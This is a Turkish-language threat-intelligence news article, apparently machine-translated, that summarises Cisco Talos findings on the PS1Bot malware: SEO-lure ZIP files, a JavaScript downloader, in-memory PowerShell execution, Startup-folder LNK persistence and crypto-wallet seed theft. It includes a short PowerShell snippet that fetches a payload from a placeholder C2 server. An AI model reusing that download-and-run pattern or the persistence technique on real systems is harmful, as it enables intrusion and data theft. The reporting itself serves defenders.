PowerShell ve C# bileşenlerini kapsamlı bilgi hırsızlığı operasyonları yürütmek için birleştiren “PS1bot” adlı çok aşamalı bir çerçeve kullanan Windows sistemlerini hedefleyen gelişmiş yeni bir kötü amaçlı yazılım kampanyası ortaya çıktı.
Kötü amaçlı yazılım, saldırıya uğramış sistemlere kalıcı erişimi sürdürürken, geleneksel tespit mekanizmalarından kaçınmak için modüler mimari ve bellek içi yürütme tekniklerini kullanarak saldırı metodolojilerinde önemli bir evrimi temsil eder.
PS1BOT, “Bölüm 8 Medicare Fayda İlkesi Kılavuzu.ZIP” ve “Kanada Para Çalışma Sayfaları PDF.ZIP.E49” gibi arama motoru optimizasyon modellerini eşleştirmek için tasarlanmış dosya adlarıyla sıkıştırılmış arşivler sunan kötü niyetli kampanyalar yoluyla çalışır.
Görünüşte meşru bu dosyalar, saldırgan kontrollü sunuculardan ek kötü amaçlı bileşenler alarak enfeksiyon zincirini başlatan “Full Document.js” adlı bir JavaScript indirici içerir.
Kötü amaçlı yazılımların modüler tasarımı, tehdit aktörlerinin bilgi çalanlar, anahtarlogerlar, ekran yakalama araçları ve kalıcılık mekanizmaları dahil olmak üzere çeşitli özel bileşenleri isteğe bağlı olarak dağıtmalarını sağlar.
Cisco Talos analistleri, PS1BOT’un 2025 boyunca son derece aktif olduğunu ve yeni örneklerin sürekli olarak gözlemlendiğini ve çerçevenin devam eden gelişimini ve iyileştirilmesini gösterdiğini belirtti.
.webp)
PS1BOT’u geleneksel kötü amaçlı yazılımlardan ayıran şey, minimum disk ayak izi ve bellek içi yürütmenin kapsamlı kullanımı yoluyla gizli vurgudur.
Çerçeve, PowerShell’in modülleri diske yazmadan dinamik olarak yürütme konusunda çağrı-ekspresyon (IEX) işlevselliğini, geleneksel antivirüs çözümleri tarafından algılama olasılığını önemli ölçüde azaltır.
Sofistike kalıcılık ve kaçınma mekanizmaları
PS1BOT, karşılık gelen kısayol dosyalarının yanı sıra % ProgramData % dizininde rastgele adlandırılan PowerShell komut dosyaları oluşturan özellikle akıllı bir kalıcılık stratejisi uygular.
Kötü amaçlı yazılım, bu PowerShell komut dosyalarına işaret eden Windows Başlatma Dizini’nde kötü amaçlı bir LNK dosyası oluşturur ve sistem yeniden başlatıldıktan sonra yeniden etkinleştirilmesini sağlar.
Kalıcılık modülü, aşağıdaki kod yapısında gösterildiği gibi, komut ve kontrol sunucusunun “/dönüşüm” uç noktasından gizlenmiş yükleri alır:-
$url = "http://[C2_SERVER]/transform"
$content = (New-Object Net.WebClient).DownloadString($url)
# Content is then deobfuscated and written to randomly-named PS1 fileBu yük, ilk enfeksiyonda kullanılan aynı C2 yoklama mantığını içerir ve kendi kendine devam eden bir döngü oluşturur.
Kötü amaçlı yazılım, enfekte sistemin C: Drive seri numarasını kullanarak benzersiz iletişim URL’leri oluşturur ve operasyonel güvenliği korurken tehlikeye atılan makinelerin kişiselleştirilmiş izlenmesini sağlar.
Çerçevenin bilgi hırsızlığı yetenekleri, özellikle birden fazla dilde tohum cümle kombinasyonları içeren gömülü kelime listeleri aracılığıyla kripto para birimi cüzdanlarını hedeflemektedir.
.webp)
PS1BOT, cüzdan kurtarma cümleleri ve şifre dosyaları içeren belgeler için dosya sistemini tarar, bu hassas verileri saldırgan altyapısına HTTP Post istekleri aracılığıyla sıkıştırır ve dışarı atar.
Cisco Talos araştırmacıları, PS1BOT ve daha önce bildirilen kötü amaçlı yazılım aileleri ve Skitnet kampanyalarıyla ilişkili bileşenler de dahil olmak üzere, potansiyel paylaşılan geliştirme kaynaklarını veya bu operasyonlarda tehdit aktör işbirliğini öneren önemli kod benzerlikleri belirlediler.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.